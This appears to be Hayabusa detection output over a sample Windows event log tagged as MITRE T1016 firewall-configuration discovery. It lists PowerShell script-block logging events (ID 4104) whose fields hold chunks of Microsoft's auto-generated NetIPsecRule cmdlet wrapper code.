[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"toSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try 
{ __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parame",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 